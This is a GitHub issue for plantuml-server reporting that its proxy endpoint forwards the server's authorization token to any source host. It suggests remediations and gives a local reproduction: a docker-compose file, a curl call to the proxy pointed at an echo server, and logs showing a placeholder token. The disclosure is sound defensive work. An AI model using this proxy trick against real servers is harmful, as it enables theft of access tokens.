### ISSUE TITLE
Proxy can leak authorization token of server

### ISSUE THREAD

**Issue by catando** [plantuml/plantuml-server#168]
When using the `proxy/` endpoint, the authorization token is passed on to the source server through the `HTTP_AUTHORIZATION` header; this enables a malicious actor to set up their own web server and acquire the token. The leaked token can then be used to access other content from Github. This is particularly serious in an enterprise environment.

## Possible remediations

- Tie an authorization token to a single domain, so it is not sent as a header to others
- Proxy only to ~a whitelist~ an allowlist of domains

## Steps to reproduce

Instantiate a plantuml server and a convenience web server; for example (using docker-compose):

```yaml
version: "3"

services:
    echo:
        image: mendhak/http-https-echo:17
        environment: 
            - HTTP_PORT=8888
            - HTTPS_PORT=9999
        ports:
            - "8100:8888"
            - "8443:9999"
    plantuml:
        image: plantuml/plantuml-server:jetty
        environment:
            - HTTP_AUTHORIZATION=12312412412312312414
        ports:
            - "8080:8080"
```

The `echo` server will log requests and headers. Make a call to the proxy endpoint like this:

```shell
curl -k "http://localhost:8080/proxy?src=http://echo:8888/"
```

Inspecting the docker logs for the `echo` server reveals the token as part of the headers:
```
echo_1      | -----------------
echo_1      | {
echo_1      |     "path": "/",
echo_1      |     "headers": {
echo_1      |         "authorization": "12312412412312312414",
echo_1      |         "user-agent": "Java/11.0.9.1",
echo_1      |         "host": "echo:8888",
...
```
